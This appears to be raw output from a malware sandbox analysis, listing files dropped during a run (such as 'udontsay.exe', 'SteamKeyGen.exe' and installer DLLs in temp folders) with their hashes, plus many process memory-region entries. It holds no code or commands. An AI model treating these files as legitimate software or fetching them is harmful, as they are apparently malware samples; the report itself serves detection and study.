C:\Users\Admin\AppData\Local\Temp\tvstream22.exe

MD5 2973af2b241aeced0f58d627b9b64389
SHA1 17a5bad765b78fe1f8ca42452a7c570b8c1d7d84
SHA256 36a98b7bcf2e6f3a6d79bbf3abe89c65c4d5f5b333cd5c7031089db0112709ec
SHA512 766eda9cce97b96b6a7462bfca13a859605c9abb9f62b6c080c8105138844abd41701900aafd5ba9b155333dec0a8171a790543cda7f6a1f945005d0ad412e39

memory/4924-244-0x0000000000160000-0x000000000053B000-memory.dmp

memory/4992-265-0x0000000000570000-0x0000000000579000-memory.dmp

memory/4992-266-0x00000000007A0000-0x00000000007AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ES0TD.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/4452-268-0x0000000000000000-mapping.dmp

memory/5052-271-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 305258d85319c7ebc85dd6f9df4c767b
SHA1 4b8d266f9adcb70d2396cd1c91f96862dc6478c8
SHA256 21051ebd0c936628c01fa42159a3bccb0eeeaf474981e3410319318c001b92e7
SHA512 a38ea6613290b18fd9650aa31c49e149c0e06b31a070dc9310a2e5f98d41833c352fe63fd827809b02236a967b862733d70b3af5194d1a8150188f1d7dfc73f4

C:\Users\Admin\AppData\Local\Temp\udontsay.exe

MD5 d330b06e5db0d2762afc840106a3c453
SHA1 02a94a31cb7fa526dbbcf0998bb5759b5abda55e
SHA256 adb97599b86196b2a2e47cbcd4eb605f11d809674678da2be9ff1f425c3f2653
SHA512 bd0f8193d133a4b71cf21e5e5b7688d5dd6795a42d9f795a036a79e47599f8d2c1836874001a27dac57946b5cabdffd402d5101a5197b28f810bdfc40cc62344

memory/4408-281-0x0000000000000000-mapping.dmp

memory/4408-289-0x0000000000830000-0x0000000000850000-memory.dmp

C:\Users\Public\SteamKeyNeg.exe

MD5 64eeb5ab677596ec8516a8414428b5d7
SHA1 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
SHA256 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
SHA512 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439

memory/1420-294-0x0000000000000000-mapping.dmp

memory/4288-293-0x0000000000C60000-0x0000000000D35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp

MD5 127ff88c447a99fca6c0907f27e61ca1
SHA1 a57cf8ca347f1bb6767bc4f0b10b1fbccb315f46
SHA256 7de9e69ff6305c9e2b52f05f365eb775521502dbccac937842725cc0e8972e0a
SHA512 9aa052473b0717c795585031baa0fcbabd71a89b3fc7eb8e0a66f3f94f582394ca57ee52e7fb23b5b31831036870c64929ab2c50c255498a0193064a83ec1471

memory/1836-298-0x0000000000000000-mapping.dmp

memory/4288-295-0x0000000001000000-0x0000000001001000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

MD5 18c89c072929521e7fa99f0881f4d553
SHA1 9c75dba87aee774c7c2c4586227aea5b3eaa44e4
SHA256 60f9d34b4f1fda5196c7fb14c5077c8053eb2b98721caccd16ed7a933913157d
SHA512 5e11bfe8ce9a54ff4a5acf1d289b2e603978bc5ebcada1e192b04095820d35381100f04390c1cc9d732f38e38681c47d5c76f398b97efb8df89cef93dd9e653f

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

MD5 18c89c072929521e7fa99f0881f4d553
SHA1 9c75dba87aee774c7c2c4586227aea5b3eaa44e4
SHA256 60f9d34b4f1fda5196c7fb14c5077c8053eb2b98721caccd16ed7a933913157d
SHA512 5e11bfe8ce9a54ff4a5acf1d289b2e603978bc5ebcada1e192b04095820d35381100f04390c1cc9d732f38e38681c47d5c76f398b97efb8df89cef93dd9e653f

memory/1836-304-0x0000000000950000-0x0000000000A2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

memory/4976-307-0x0000000000000000-mapping.dmp

memory/4288-310-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/4408-311-0x0000000005080000-0x0000000005092000-memory.dmp

memory/4408-318-0x00000000051B0000-0x00000000052BA000-memory.dmp

memory/4472-322-0x0000000000000000-mapping.dmp

memory/4408-320-0x00000000050E0000-0x000000000511C000-memory.dmp

memory/4472-326-0x00000000001C0000-0x00000000001C8000-memory.dmp

memory/3140-331-0x0000000000000000-mapping.dmp

memory/2420-332-0x0000000000000000-mapping.dmp

memory/2960-334-0x0000000000400000-0x00000000006BF000-memory.dmp

memory/2420-336-0x0000000000B00000-0x0000000000B08000-memory.dmp

memory/780-340-0x0000000000000000-mapping.dmp

memory/2960-335-0x0000000000020000-0x0000000000023000-memory.dmp

memory/4196-328-0x0000000000000000-mapping.dmp

memory/1688-341-0x0000000000630000-0x0000000000707000-memory.dmp

memory/780-345-0x0000000000880000-0x0000000000888000-memory.dmp

memory/4124-342-0x0000000000000000-mapping.dmp

memory/2516-324-0x0000000000000000-mapping.dmp

memory/1836-317-0x0000000000950000-0x0000000000A2E000-memory.dmp

memory/1688-316-0x0000000000000000-mapping.dmp

memory/3132-315-0x0000000000000000-mapping.dmp

memory/4976-314-0x00000000004B0000-0x00000000004B8000-memory.dmp

memory/4408-309-0x00000000055E0000-0x0000000005BF8000-memory.dmp

memory/4288-306-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/1836-305-0x0000000000A40000-0x0000000000A41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

C:\Users\Admin\AppData\Local\Temp\nsg655B.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

memory/4288-303-0x0000000076C80000-0x0000000076E95000-memory.dmp

memory/1400-292-0x0000000000000000-mapping.dmp

memory/4288-291-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/2800-290-0x0000000000400000-0x00000000004CC000-memory.dmp

C:\Users\Public\SteamKeyNeg.exe

MD5 64eeb5ab677596ec8516a8414428b5d7
SHA1 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
SHA256 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
SHA512 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439

C:\Users\Admin\AppData\Local\Temp\6AHD0.exe

MD5 5e2b57ba7e724923726235f4bab6dc3a
SHA1 717d816d000606d9778328d5400cb200d5a32aba
SHA256 ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de
SHA512 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b

C:\Users\Admin\AppData\Local\Temp\6AHD0.exe

MD5 5e2b57ba7e724923726235f4bab6dc3a
SHA1 717d816d000606d9778328d5400cb200d5a32aba
SHA256 ebccec79dade98b555e165fc883e7832fb86a1178e5c9ef807a947a9ce8141de
SHA512 79efb25d12371af32eda91f5896cca07fb917aa563e951aeb06f223b52ed5d018c31055cf55e73ad32ce821c7d54d8cb695fa5c63ee62b6225f0739d6166523b

memory/1036-347-0x0000000000000000-mapping.dmp

memory/2420-350-0x0000000002CC0000-0x0000000002CC2000-memory.dmp

memory/1036-353-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/2032-356-0x0000000000632000-0x0000000000659000-memory.dmp

memory/4924-357-0x0000000000160000-0x000000000053B000-memory.dmp

memory/1036-360-0x000002D078310000-0x000002D078312000-memory.dmp

memory/2032-361-0x0000000000400000-0x0000000000481000-memory.dmp

memory/4924-363-0x0000000077A40000-0x0000000077BE3000-memory.dmp

memory/4288-364-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/4508-366-0x0000000000000000-mapping.dmp

memory/5052-365-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4516-359-0x0000000000000000-mapping.dmp

memory/2032-358-0x00000000005C0000-0x0000000000604000-memory.dmp

memory/3176-368-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/3176-369-0x0000000000C40000-0x0000000000C42000-memory.dmp

memory/1036-355-0x000002D0766C0000-0x000002D0766C6000-memory.dmp

memory/1836-371-0x0000000000F00000-0x0000000000F46000-memory.dmp

memory/4288-370-0x0000000002B30000-0x0000000002B76000-memory.dmp

memory/4924-352-0x0000000000B90000-0x0000000000BD4000-memory.dmp

memory/2420-346-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/4196-349-0x0000000000660000-0x0000000000700000-memory.dmp

memory/4228-348-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\udontsay.exe

MD5 d330b06e5db0d2762afc840106a3c453
SHA1 02a94a31cb7fa526dbbcf0998bb5759b5abda55e
SHA256 adb97599b86196b2a2e47cbcd4eb605f11d809674678da2be9ff1f425c3f2653
SHA512 bd0f8193d133a4b71cf21e5e5b7688d5dd6795a42d9f795a036a79e47599f8d2c1836874001a27dac57946b5cabdffd402d5101a5197b28f810bdfc40cc62344

memory/3176-282-0x0000000000710000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nse6079.tmp\nsisdl.dll

MD5 ee68463fed225c5c98d800bdbd205598
SHA1 306364af624de3028e2078c4d8c234fa497bd723
SHA256 419485a096bc7d95f872ed1b9b7b5c537231183d710363beee4d235bb79dbe04
SHA512 b14fb74cb76b8f4e80fdd75b44adac3605883e2dcdb06b870811759d82fa2ec732cd63301f20a2168d7ad74510f62572818f90038f5116fe19c899eba68a5107

memory/4288-280-0x0000000000000000-mapping.dmp

C:\Users\Public\SteamKeyGen.exe

MD5 c523d423234494eeb7b60a892d7a4bea
SHA1 db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA256 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA512 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec

C:\Users\Public\SteamKeyGen.exe

MD5 c523d423234494eeb7b60a892d7a4bea
SHA1 db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA256 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA512 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec

memory/5052-275-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/2984-273-0x0000000000000000-mapping.dmp

memory/3176-272-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

MD5 35fcec704d7072157fd5fdc35b543904
SHA1 34677f3d61028d45d87b952c9ec1f851729981a9
SHA256 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859
SHA512 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe

MD5 35fcec704d7072157fd5fdc35b543904
SHA1 34677f3d61028d45d87b952c9ec1f851729981a9
SHA256 9a49d97abc9f621287365999038cf919581abba2d89fcc1daf704bd34b298859
SHA512 863500aa8acc3f35ad346b7d2a8037d2b5a40810baee99f0ab7333f6fbdad4234d789a0d857cf884490a2c0b3b87c70318a09b85f762f0b5340f7b2bfaa09197

memory/1836-373-0x0000000000950000-0x0000000000A2E000-memory.dmp

memory/4288-372-0x0000000000C60000-0x0000000000D35000-memory.dmp

memory/1836-374-0x0000000000950000-0x0000000000A2E000-memory.dmp

memory/4976-375-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/4976-376-0x0000000000D10000-0x0000000000D12000-memory.dmp

memory/1688-378-0x0000000000630000-0x0000000000707000-memory.dmp

memory/5512-379-0x0000000000000000-mapping.dmp

memory/4472-380-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/4472-381-0x0000000000940000-0x0000000000942000-memory.dmp

memory/1688-382-0x0000000000630000-0x0000000000707000-memory.dmp

memory/4196-384-0x0000000002E40000-0x0000000002E86000-memory.dmp

memory/4196-385-0x0000000000660000-0x0000000000700000-memory.dmp

memory/4408-386-0x0000000005420000-0x0000000005496000-memory.dmp

memory/780-389-0x0000000002850000-0x0000000002852000-memory.dmp

memory/4196-390-0x00000000064A0000-0x0000000006532000-memory.dmp

memory/5584-391-0x0000000000000000-mapping.dmp

memory/5640-392-0x0000000000000000-mapping.dmp

memory/4196-393-0x0000000006480000-0x000000000648A000-memory.dmp

memory/780-388-0x00007FFC754A0000-0x00007FFC75F61000-memory.dmp

memory/4196-387-0x0000000006960000-0x0000000006F04000-memory.dmp

memory/5552-383-0x0000000000000000-mapping.dmp

memory/5808-394-0x0000000000000000-mapping.dmp

memory/1688-377-0x0000000002C80000-0x0000000002CC6000-memory.dmp

memory/5892-395-0x0000000000000000-mapping.dmp

memory/4452-396-0x0000000002412000-0x00000000026DB000-memory.dmp

memory/4452-397-0x00000000026E0000-0x00000000029CC000-memory.dmp

memory/1688-398-0x0000000008A60000-0x0000000008AC6000-memory.dmp

memory/1836-399-0x0000000006A40000-0x0000000006A5E000-memory.dmp

memory/5160-400-0x0000000000000000-mapping.dmp

memory/1972-403-0x0000000000000000-mapping.dmp

memory/5360-404-0x0000000000000000-mapping.dmp

memory/5628-405-0x0000000000000000-mapping.dmp

memory/1688-408-0x0000000009870000-0x0000000009A32000-memory.dmp

memory/4408-407-0x0000000006A30000-0x0000000006A80000-memory.dmp

memory/5728-406-0x0000000000000000-mapping.dmp

memory/5800-411-0x0000000000000000-mapping.dmp

memory/6024-413-0x0000000000000000-mapping.dmp

memory/2436-415-0x0000000000000000-mapping.dmp